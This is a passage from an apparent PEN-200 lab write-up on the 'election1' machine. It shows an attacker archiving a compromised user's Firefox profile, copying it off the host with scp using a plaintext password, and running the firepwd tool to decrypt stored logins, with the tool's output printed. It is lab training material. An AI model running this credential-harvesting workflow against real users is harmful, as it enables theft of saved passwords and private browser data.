Firefox
A Firefox profile has been identified in the home directory of the love user on the election host: /home/love/.mozilla
Lateral movement has been made to the love user.
love@election:~$ tar -czf firefox.tar.gz .mozilla/firefox
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sshpass -p 'P@$$w0rd@123' scp love@$IP:~/firefox.tar.gz .
Packaged and transferred
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ tar -xf firefox.tar.gz
Extracted
Decryption
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ git clone https://github.com/lclevy/firepwd ; python3 -m venv firepwd/.venv ; source firepwd/.venv/bin/activate ; pip3 install -r firepwd/requirements.txt
Cloning into 'firepwd'...
remote: Enumerating objects: 88, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 88 (delta 2), reused 3 (delta 0), pack-reused 80 (from 1)
Receiving objects: 100% (88/88), 239.08 KiB | 3.68 MiB/s, done.
Resolving deltas: 100% (41/41), done.
Collecting PyCryptodome>=3.9.0 (from -r firepwd/requirements.txt (line 1))
Using cached pycryptodome-3.23.0-cp37-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (3.4 kB)
Collecting pyasn1>=0.4.8 (from -r firepwd/requirements.txt (line 2))
Using cached pyasn1-0.6.1-py3-none-any.whl.metadata (8.4 kB)
Using cached pycryptodome-3.23.0-cp37-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (2.3 MB)
Using cached pyasn1-0.6.1-py3-none-any.whl (83 kB)
Installing collected packages: PyCryptodome, pyasn1
Successfully installed PyCryptodome-3.23.0 pyasn1-0.6.1
┌──(.venv)─(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ python3 firepwd/firepwd.py -d .mozilla/firefox/y55nwd4d.default-release
globalSalt: b'60a502c92d1c20736a4cfd37b4b227bd3046d6c3'
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
SEQUENCE {
OCTETSTRING b'cc7f8aa256d771b404297e33c0f456efb2b1170c2705c631c851bcbd37678dae'
INTEGER b'01'
INTEGER b'20'
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
}
}
}
SEQUENCE {
OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
OCTETSTRING b'73e9c3f310fd53398ac0f9a55002'
}
}
}
OCTETSTRING b'196bdc79fd0061e5e944b2da95f30bca'
}
clearText b'70617373776f72642d636865636b0202'
password check? True
no saved login/password
N/A